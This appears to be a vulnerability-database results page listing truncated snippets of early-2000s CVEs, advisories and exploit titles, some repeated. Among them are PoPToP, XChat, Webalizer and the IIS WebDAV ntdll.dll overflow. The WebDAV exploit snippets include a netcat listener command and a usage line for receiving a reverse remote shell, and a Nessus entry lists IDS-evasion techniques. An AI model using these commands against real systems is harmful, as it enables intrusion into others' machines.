PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit

No description provided by source. / exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409. The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successfull run it...

CVE-2002-0698

Buffer overflow in Internet Mail Connector IMC for Microsoft Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, which triggers the overflow in IMC's hello response...

CVE-2002-0382

XChat IRC client allows remote attackers to execute arbitrary commands via a /dns command on a host whose DNS reverse lookup contains shell metacharacters...

CVE-2002-0382

Summary: CVE-2002-0382 affects the XChat IRC client. The issue arises when handling a /dns query, where the DNS reverse lookup can contain shell metacharacters, allowing arbitrary commands to be executed with the user’s privileges. This is caused by XChat passing the resolver/hostname to a shell ...

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

// / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 / / the shellcode is a reverse remote shell / / y...

Microsoft IIS - WebDAV ntdll.dll Remote Overflow

Microsoft IIS - WebDAV ntdll.dll Remote Overflow // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / / --------------------------------------------------------------- / / this is the exploit for ntdll.dll through WebDAV. / / run a netcat ex: nc -L -vv -p 666 / / wb server.com yourip 666 0 ...

MS Windows WebDAV (ntdll.dll) Remote Exploit

Exploit for unknown platform in category remote exploits ============================================ MS Windows WebDAV ntdll.dll Remote Exploit ============================================ // / Crpt ntdll.dll exploit trough WebDAV by kralor Crpt / /...

sircd -- remote reverse DNS buffer overflow

Secunia reports: A vulnerability in sircd can be exploited by a malicious person to compromise a vulnerable system. The vulnerability is caused by a boundary error in the code handling reverse DNS lookups, when a user connects to the service. If the FQDN Fully Qualified Domain Name returned is...

Yet another plaintext attack to ZIP encryption scheme.

Introduction ------------ The ZIP format is one of the most widely used compresion/archival programs on computers systems, its use is even more extended on Windows plataform, with WinZIP program. Known Attacks ------------- The PKZIP encryption scheme have been proved to be weak in a lot of paper...

IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server

Illegal Instruction Labs Advisory ------------------------------------------------------------------------- Advisory name: Reverse traversal vulnerability in Monkey 0.1.4 HTTP server Advisory number: 12 Application: Monkey 0.1.4 HTTP server Application author: Eduardo Silva EdsipeR Author e-mail:...

CVE-2002-0804

Bugzilla 2.14 before 2.14.2, and 2.16 before 2.16rc2, when configured to perform reverse DNS lookups, allows remote attackers to bypass IP restrictions by connecting from a system with a spoofed reverse DNS hostname...

argospill.sh

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team N.finity Security Advisory 03/07/2002 Argosoft Mail Server Plus/Pro Webmail Reverse Directory Traversal Summary =================== Argosoft Mail Server Pro contains a built-in HTTP server for webmail access. Without logging in, an attacker can d...

HTTP Reverse Proxy Detection (Deprecated)

This web server is reachable through a reverse HTTP proxy. Note: This plugin has been deprecated. @DEPRECATED@ C Tenable Network Security, Inc. HTTP/1.1 is defined by RFC 2068 Check for proxy on the way transparent or reverse?! include"compat.inc"; ifdescription scriptid11040; scriptversion "1.37...

CVE-2002-0382

XChat IRC client allows remote attackers to execute arbitrary commands via a /dns command on a host whose DNS reverse lookup contains shell metacharacters...

CVE-2002-0180

Buffer overflow in Webalizer 2.01-06, when configured to use reverse DNS lookups, allows remote attackers to execute arbitrary code by connecting to the monitored web server from an IP address that resolves to a long hostname...

CVE-2002-0180

Buffer overflow in Webalizer 2.01-06, when configured to use reverse DNS lookups, allows remote attackers to execute arbitrary code by connecting to the monitored web server from an IP address that resolves to a long hostname...

CVE-2002-0180

CVE-2002-0180, a buffer overflow in Webalizer when reverse DNS lookups are enabled, can allow remote code execution by connecting from an IP whose hostname resolves long. Affected versions include Webalizer prior to 2.01-10; Red Hat advisory RHSA-2002:255 fixes with Webalizer 2.01-09 backported p...

Remote buffer overflow in Webalizer

Release : April 15 2002 Author : Spybreak [email protected] Software : Webalizer Version : 2.01-09, 2.01-06 URL : http://www.mrunix.net/webalizer/ Status : vendor contacted Problems : remote buffer overflow --- INTRO --- The Webalizer is a web server log file analysis program which produces usage...

HTTP NIDS Evasion

This plugin configures Nessus for NIDS evasion see the 'Prefs' panel. NIDS evasion options are useful if you want to determine the quality of the expensive NIDS you just bought. HTTP evasion techniques : - HEAD: use HEAD method instead of GET - URL encoding: - Hex: change characters to %XX - MS...

Legato Networker vulnerability

There's a weakness in the authentification scheme of Legato Networker Software prior to version 6.1. When a client contacts the server, it announces in clear text via RPC his hostname or ip adress , his username and the user's groups. Then the server tries to resolve the ip adress of the machine...